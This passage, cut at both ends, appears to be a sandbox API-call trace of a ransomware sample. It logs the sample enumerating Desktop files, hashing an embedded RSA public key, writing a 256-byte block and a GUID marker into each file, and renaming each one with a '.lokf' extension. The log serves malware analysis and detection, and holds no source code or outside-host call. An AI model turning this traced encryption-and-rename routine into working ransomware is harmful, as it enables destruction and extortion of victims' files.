KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.463] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.463] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.464] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.464] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0058.464] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.464] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.464] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.464] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.464] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.464] GetLastError () returned 0x0 [0058.464] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.464] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0058.464] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.465] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.465] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.465] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.465] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.465] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.465] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa444, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.465] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.465] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.465] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.465] CloseHandle (hObject=0x5cc) returned 1 [0058.466] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.466] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.466] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6NumCnon.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6numcnon.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6NumCnon.pps.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6numcnon.pps.lokf")) returned 1 [0058.468] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d06ee0, ftCreationTime.dwHighDateTime=0x1d4d402, ftLastAccessTime.dwLowDateTime=0x35623c00, ftLastAccessTime.dwHighDateTime=0x1d4d48b, ftLastWriteTime.dwLowDateTime=0x35623c00, ftLastWriteTime.dwHighDateTime=0x1d4d48b, nFileSizeHigh=0x0, nFileSizeLow=0xa454, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8Ky0ltRrnhjM32N.png", cAlternateFileName="8KY0LT~1.PNG")) returned 1 [0058.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.468] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.468] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8Ky0ltRrnhjM32N.png") returned=".png" [0058.468] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8Ky0ltRrnhjM32N.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8ky0ltrrnhjm32n.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.468] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=42068) returned 1 [0058.468] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.470] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa42e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.470] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.471] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xa454, lpOverlapped=0x0) returned 1 [0058.471] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.471] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.471] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.471] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.472] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.472] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.472] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.472] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.472] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.472] GetLastError () returned 0x0 [0058.472] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.472] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.472] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.472] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.472] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.472] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.473] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.473] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.473] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa454, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.473] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.473] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.473] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.473] CloseHandle (hObject=0x5cc) returned 1 [0058.474] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.474] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0058.474] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8Ky0ltRrnhjM32N.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8ky0ltrrnhjm32n.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8Ky0ltRrnhjM32N.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8ky0ltrrnhjm32n.png.lokf")) returned 1 [0058.482] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4bb8c420, ftCreationTime.dwHighDateTime=0x1d4cf8f, ftLastAccessTime.dwLowDateTime=0x808bf300, ftLastAccessTime.dwHighDateTime=0x1d4ce83, ftLastWriteTime.dwLowDateTime=0x808bf300, ftLastWriteTime.dwHighDateTime=0x1d4ce83, nFileSizeHigh=0x0, nFileSizeLow=0xae05, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8XYY enP9O0YVVimx1.mp3", cAlternateFileName="8XYYEN~1.MP3")) returned 1 [0058.482] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.482] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.482] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8XYY enP9O0YVVimx1.mp3") returned=".mp3" [0058.483] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8XYY enP9O0YVVimx1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8xyy enp9o0yvvimx1.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.483] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=44549) returned 1 [0058.483] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.485] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xaddf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.485] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.485] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.485] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xae05, lpOverlapped=0x0) returned 1 [0058.486] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.486] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.486] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.486] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.486] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.487] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.487] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.487] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.487] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.487] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.487] GetLastError () returned 0x0 [0058.487] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.487] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.487] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.487] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.487] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.487] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.487] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x32947b0 [0058.487] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32949d0 [0058.487] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xae05, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.488] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.488] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.488] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.488] CloseHandle (hObject=0x5cc) returned 1 [0058.489] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.489] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.489] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8XYY enP9O0YVVimx1.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8xyy enp9o0yvvimx1.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\8XYY enP9O0YVVimx1.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\8xyy enp9o0yvvimx1.mp3.lokf")) returned 1 [0058.490] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb9af730, ftCreationTime.dwHighDateTime=0x1d4d0ac, ftLastAccessTime.dwLowDateTime=0xa1b0df30, ftLastAccessTime.dwHighDateTime=0x1d4d1eb, ftLastWriteTime.dwLowDateTime=0xa1b0df30, ftLastWriteTime.dwHighDateTime=0x1d4d1eb, nFileSizeHigh=0x0, nFileSizeLow=0x15f2c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9Md r.swf", cAlternateFileName="9MDR~1.SWF")) returned 1 [0058.490] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.490] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.490] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Md r.swf") returned=".swf" [0058.490] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9Md r.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9md r.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.490] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=89900) returned 1 [0058.490] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.492] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x15f06, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.492] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.493] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.493] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x15f2c, lpOverlapped=0x0) returned 1 [0058.493] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.493] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.493] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.493] lstrlenA (lpString="-----BEGIN PUBLIC 